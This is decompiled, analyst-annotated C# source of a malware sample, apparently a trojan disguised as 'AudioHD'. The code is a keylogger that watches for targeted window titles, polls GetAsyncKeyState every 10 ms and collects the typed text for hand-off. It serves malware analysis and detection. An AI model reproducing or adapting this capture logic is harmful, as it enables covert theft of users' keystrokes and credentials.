// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u000E;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Timers;
using System.Windows.Forms;
namespace \u0007
{
internal sealed class \u0007
{
// Static state of this type.
// The obfuscator gave several fields the same name (\u0001, \u0002, \u0003) and
// relies on their differing types to tell them apart. That is legal in IL but not
// in C#, so this decompiled listing does not compile as-is, and every use further
// down has to be resolved from the type the surrounding expression requires.

// Used throughout the file in call position with an integer argument, with the
// result compared against or appended to strings.
// NOTE(review): presumably the obfuscator's integer-keyed string lookup/decryption
// delegate; its type \u0002 is declared outside this file - confirm against the IL.
[NonSerialized]
internal static \u0002 \u0001;
// Instance of the externally declared type \u0008; created in the static constructor.
private static \u0008 \u0001;
// NOTE(review): presumably the buffer the timer handler appends key text to - confirm.
private static string \u0001;
// NOTE(review): presumably the remembered window title handed to the \u0008 object
// together with the buffer - confirm.
private static string \u0002;
// Polling timer; configured in the entry routine with a 10 ms interval.
private static System.Timers.Timer \u0001;
// Two string fields assigned once at the start of the entry routine.
private static string \u0003;
private static string \u0004;
// Three boolean latches, each toggled in the timer handler next to one of the
// modifier-state checks so that a marker is appended only when the state changes.
private static bool \u0001;
private static bool \u0002;
private static bool \u0003;
// Win32 imports from User32.dll. All four are bound to the same obfuscated managed
// name (\u000F) and are told apart only by signature.
// Analyst note: this import set (GetAsyncKeyState + GetForegroundWindow +
// GetWindowText) with no keyboard hook is a common user-mode keystroke-polling
// footprint and is worth checking in import-table and API-call telemetry.

// GetAsyncKeyState taking a System.Windows.Forms.Keys value; used by the
// modifier-state getters further down.
[DllImport("User32.dll", EntryPoint = "GetAsyncKeyState")]
private static extern short \u000F([In] Keys obj0);

// GetAsyncKeyState taking a raw integer key code; used by the timer handler while
// it walks every value of the Keys enum.
[DllImport("User32.dll", EntryPoint = "GetAsyncKeyState")]
private static extern short \u000F([In] int obj0);

// GetWindowText: copies a window's title text into the supplied StringBuilder.
// The window handle is declared as int here rather than IntPtr.
[DllImport("User32.dll", EntryPoint = "GetWindowText")]
public static extern int \u000F([In] int obj0, [In] StringBuilder obj1, [In] int obj2);

// GetForegroundWindow: returns the handle of the window the user is working in.
[DllImport("User32.dll", EntryPoint = "GetForegroundWindow")]
public static extern int \u000F();
// Entry routine: never returns. Once per second it reads the foreground window
// title and, while the title contains one of 14 looked-up substrings, keeps the
// 10 ms key-polling timer running; when the title stops matching and something has
// been collected, it passes the collected text to the \u0008 object.
// Behaviour visible here that a defender can key on: a 1-second foreground-title
// poll combined with a 10 ms timer that is only active for selected window titles.
public static void \u000F()
{
    // Ambiguous after decompilation: an overload of \u000F() is assigned to a field
    // named \u0003, then copied to \u0004.
    // NOTE(review): presumably the two string fields receive the current window
    // title - confirm against the IL.
    \u0007.\u0007.\u0003 = \u0007.\u0007.\u000F();
    \u0007.\u0007.\u0004 = \u0007.\u0007.\u0003;
    // Lookup value 864 is used throughout as the "nothing collected yet" value.
    // NOTE(review): presumably the empty string - the decoded text is not on this page.
    \u0007.\u0007.\u0001 = \u0007.\u0007.\u0001(864);
    // Timer is created disabled; it is started and stopped by the loop below.
    \u0007.\u0007.\u0001 = new System.Timers.Timer();
    \u0007.\u0007.\u0001.Elapsed += new ElapsedEventHandler(\u0007.\u0007.\u000F);
    \u0007.\u0007.\u0001.Interval = 10.0;
    \u0007.\u0007.\u0001.Enabled = false;
    while (true)
    {
        // Upper-cased so the substring tests below are case-insensitive.
        string upper = \u0007.\u0007.\u000F().ToUpper();
        // Target list: 14 substrings fetched by lookup ids 865..1050. Their decoded
        // values are not visible in this file.
        if (upper.Contains(\u0007.\u0007.\u0001(865)) || upper.Contains(\u0007.\u0007.\u0001(874)) || upper.Contains(\u0007.\u0007.\u0001(891)) || upper.Contains(\u0007.\u0007.\u0001(904)) || upper.Contains(\u0007.\u0007.\u0001(917)) || upper.Contains(\u0007.\u0007.\u0001(926)) || upper.Contains(\u0007.\u0007.\u0001(935)) || upper.Contains(\u0007.\u0007.\u0001(948)) || upper.Contains(\u0007.\u0007.\u0001(965)) || upper.Contains(\u0007.\u0007.\u0001(978)) || upper.Contains(\u0007.\u0007.\u0001(999)) || upper.Contains(\u0007.\u0007.\u0001(1016)) || upper.Contains(\u0007.\u0007.\u0001(1033)) || upper.Contains(\u0007.\u0007.\u0001(1050)))
        {
            \u0007.\u0007.\u0001.Start();
            // Remember the matching title only if none is stored yet. Nothing in
            // this file puts the string field \u0002 back to the 864 value after a
            // hand-off, so later matches appear to keep the first stored title.
            if (\u0007.\u0007.\u0002 == \u0007.\u0007.\u0001(864))
                \u0007.\u0007.\u0002 = upper;
        }
        // Title no longer matches and the collected text differs from the 864 value.
        else if (\u0007.\u0007.\u0001 != \u0007.\u0007.\u0001(864))
        {
            \u0007.\u0007.\u0001.Stop();
            // Hand-off to the \u0008 instance. What that method does with the two
            // values is defined outside this file.
            // NOTE(review): arguments look like (stored title, collected text) - confirm.
            \u0007.\u0007.\u0001.\u000F(\u0007.\u0007.\u0002, \u0007.\u0007.\u0001);
            \u0007.\u0007.\u0001 = \u0007.\u0007.\u0001(864);
        }
        Thread.Sleep(1000);
    }
}
// Returns the title text of the current foreground window, or the string fetched
// by lookup id 1071 when no usable title was read.
public static string \u000F()
{
    // Parameterless \u000F() resolving to an int here is the GetForegroundWindow import.
    int num1 = \u0007.\u0007.\u000F();
    StringBuilder stringBuilder = new StringBuilder(1024);
    // GetWindowText import: handle, destination buffer, buffer capacity.
    int num2 = \u0007.\u0007.\u000F(num1, stringBuilder, stringBuilder.Capacity);
    // A non-positive result, or one larger than what ended up in the builder, is
    // treated as "no title" and replaced by the 1071 fallback string.
    return num2 <= 0 || num2 > stringBuilder.Length ? \u0007.\u0007.\u0001(1071) : stringBuilder.ToString();
}
// Timer callback (wired to Elapsed in the entry routine, 10 ms interval).
// On every tick it walks all values of the Keys enum, asks GetAsyncKeyState about
// each one, and for keys reported as newly pressed appends text to a string field.
// All marker and replacement strings come from the integer-keyed lookup; their
// decoded values are not visible in this file.
// Analyst note: a process calling GetAsyncKeyState for the whole key range roughly
// every 10 ms is the runtime behaviour to look for in API-call telemetry.
private static void \u000F([In] object obj0, [In] ElapsedEventArgs obj1)
{
    foreach (int num in Enum.GetValues(typeof (Keys)))
    {
        // -32767 as a short is 0x8001: high bit = key is down, low bit = pressed
        // since the previous GetAsyncKeyState call.
        if (\u0007.\u0007.\u000F(num) == (short) -32767)
        {
            // Modifier tracking, three times the same shape: when a modifier's state
            // differs from its latch, flip the latch and append a marker string.
            // First pair: boolean \u000F() is the Keys.ControlKey getter.
            if (\u0007.\u0007.\u000F())
            {
                if (!\u0007.\u0007.\u0002)
                {
                    \u0007.\u0007.\u0002 = true;
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1084);
                }
            }
            else if (\u0007.\u0007.\u0002)
            {
                \u0007.\u0007.\u0002 = false;
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1097);
            }
            // Second pair: \u0012() is the Keys.Menu (Alt) getter.
            if (\u0007.\u0007.\u0012())
            {
                if (!\u0007.\u0007.\u0001)
                {
                    \u0007.\u0007.\u0001 = true;
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1114);
                }
            }
            else if (\u0007.\u0007.\u0001)
            {
                \u0007.\u0007.\u0001 = false;
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1127);
            }
            // Third pair: \u0011() is the Keys.Capital (Caps Lock) getter.
            if (\u0007.\u0007.\u0011())
            {
                if (!\u0007.\u0007.\u0003)
                {
                    \u0007.\u0007.\u0003 = true;
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1140);
                }
            }
            else if (\u0007.\u0007.\u0003)
            {
                \u0007.\u0007.\u0003 = false;
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1161);
            }
            // Named-key handling: the Keys enum name of the pressed key is compared
            // with looked-up names, and a looked-up replacement string is appended.
            if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1182))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1195);
            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1208))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1221);
            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1234))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1243);
            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1260))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1269);
            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1274))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1283);
            // Ignore list: keys whose name equals any of these looked-up names fall
            // to the "continue" below and are skipped. Id 1313 is tested twice.
            // NOTE(review): presumably the modifier keys already handled above - confirm.
            else if (!(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1296)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1313)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1330)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1313)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1347)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1360)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1373)))
            {
                // Second group of named keys with their replacement strings.
                if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1386))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1395);
                else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1404))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1413);
                else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1422))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1431);
                else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1440))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1445);
                else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1454))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1459);
                else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1468))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1477);
                else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1490))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1503);
                else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1520) || Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1529))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1538);
            }
            else
                continue;
            // Character handling. \u0010() is the Keys.ShiftKey getter, so this
            // branch runs while Shift is held.
            if (\u0007.\u0007.\u0010())
            {
                // Codes 65..122 are appended as the character with that code. The
                // range runs past 'Z' (90), so non-letter key codes in 91..122 are
                // converted too. The (string)(object)(char) cast chain is a
                // decompiler artifact and would not succeed if compiled as written.
                if (num >= 65 && num <= 122)
                    \u0007.\u0007.\u0001 += (string) (object) (char) num;
                // Remaining keys: the decimal text of the key code is compared with
                // looked-up strings and the Shift-state replacement is appended.
                else if (num.ToString() == \u0007.\u0007.\u0001(1547))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1552);
                else if (num.ToString() == \u0007.\u0007.\u0001(1557))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1562);
                else if (num.ToString() == \u0007.\u0007.\u0001(1567))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1572);
                else if (num.ToString() == \u0007.\u0007.\u0001(1577))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1582);
                else if (num.ToString() == \u0007.\u0007.\u0001(1587))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1592);
                else if (num.ToString() == \u0007.\u0007.\u0001(1597))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1602);
                else if (num.ToString() == \u0007.\u0007.\u0001(1607))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1612);
                else if (num.ToString() == \u0007.\u0007.\u0001(1617))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1622);
                else if (num.ToString() == \u0007.\u0007.\u0001(1627))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1632);
                else if (num.ToString() == \u0007.\u0007.\u0001(1637))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1642);
                else if (num.ToString() == \u0007.\u0007.\u0001(1647))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1652);
                else if (num.ToString() == \u0007.\u0007.\u0001(1657))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1662);
                else if (num.ToString() == \u0007.\u0007.\u0001(1667))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1672);
                else if (num.ToString() == \u0007.\u0007.\u0001(1677))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1682);
                else if (num.ToString() == \u0007.\u0007.\u0001(1687))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1692);
                else if (num.ToString() == \u0007.\u0007.\u0001(1697))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1702);
                else if (num.ToString() == \u0007.\u0007.\u0001(1707))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1712);
                else if (num.ToString() == \u0007.\u0007.\u0001(1717))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1722);
                else if (num.ToString() == \u0007.\u0007.\u0001(1727))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1732);
                else if (num.ToString() == \u0007.\u0007.\u0001(1737))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1742);
                else if (num.ToString() == \u0007.\u0007.\u0001(1747))
                    \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1752);
            }
            // Shift not held: same 65..122 range, shifted by 32 to the lower-case
            // code, then the unshifted replacement table. This table has no entry
            // for id 1647 and adds one for id 1817 compared with the Shift table.
            else if (num >= 65 && num <= 122)
                \u0007.\u0007.\u0001 += (string) (object) (char) (num + 32);
            else if (num.ToString() == \u0007.\u0007.\u0001(1547))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1757);
            else if (num.ToString() == \u0007.\u0007.\u0001(1557))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1762);
            else if (num.ToString() == \u0007.\u0007.\u0001(1567))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1767);
            else if (num.ToString() == \u0007.\u0007.\u0001(1577))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1772);
            else if (num.ToString() == \u0007.\u0007.\u0001(1587))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1777);
            else if (num.ToString() == \u0007.\u0007.\u0001(1597))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1782);
            else if (num.ToString() == \u0007.\u0007.\u0001(1607))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1787);
            else if (num.ToString() == \u0007.\u0007.\u0001(1617))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1792);
            else if (num.ToString() == \u0007.\u0007.\u0001(1627))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1797);
            else if (num.ToString() == \u0007.\u0007.\u0001(1637))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1802);
            else if (num.ToString() == \u0007.\u0007.\u0001(1657))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1807);
            else if (num.ToString() == \u0007.\u0007.\u0001(1667))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1812);
            else if (num.ToString() == \u0007.\u0007.\u0001(1817))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1822);
            else if (num.ToString() == \u0007.\u0007.\u0001(1677))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1827);
            else if (num.ToString() == \u0007.\u0007.\u0001(1687))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1832);
            else if (num.ToString() == \u0007.\u0007.\u0001(1697))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1837);
            else if (num.ToString() == \u0007.\u0007.\u0001(1707))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1842);
            else if (num.ToString() == \u0007.\u0007.\u0001(1717))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1847);
            else if (num.ToString() == \u0007.\u0007.\u0001(1727))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1852);
            else if (num.ToString() == \u0007.\u0007.\u0001(1737))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1857);
            else if (num.ToString() == \u0007.\u0007.\u0001(1747))
                \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1862);
        }
    }
}
// True while the Control key is down: masks the GetAsyncKeyState result for
// Keys.ControlKey with 32768 (0x8000, the "currently down" bit).
// [SpecialName] suggests this was a property getter before decompilation.
[SpecialName]
public static bool \u000F() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.ControlKey) & 32768);
// True while the Shift key is down: masks the GetAsyncKeyState result for
// Keys.ShiftKey with 32768 (0x8000, the "currently down" bit).
// The timer handler uses this to choose between its two replacement tables.
[SpecialName]
public static bool \u0010() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.ShiftKey) & 32768);
// True while the Caps Lock key is physically down: masks the GetAsyncKeyState
// result for Keys.Capital with 32768 (0x8000). This is the "key is held" bit,
// not the lock's toggle state.
[SpecialName]
public static bool \u0011() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.Capital) & 32768);
// True while the Alt key is down: masks the GetAsyncKeyState result for
// Keys.Menu with 32768 (0x8000, the "currently down" bit).
[SpecialName]
public static bool \u0012() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.Menu) & 32768);
// Static constructor: runs once before the type is first used and puts the
// shared state into its initial condition.
static \u0007()
{
    // Call into the externally declared type \u0003.
    // NOTE(review): presumably this sets up the integer-keyed string lookup that
    // is used two lines below - its body is not in this file; confirm.
    \u0003.\u000F();
    // Helper object that later receives the stored title and the collected text.
    \u0007.\u0007.\u0001 = new \u0008();
    // String field \u0002 starts at the 864 value, which the entry routine treats
    // as "no title stored yet".
    \u0007.\u0007.\u0002 = \u0007.\u0007.\u0001(864);
    // All three modifier latches start cleared.
    \u0007.\u0007.\u0001 = false;
    \u0007.\u0007.\u0002 = false;
    \u0007.\u0007.\u0003 = false;
}
}
}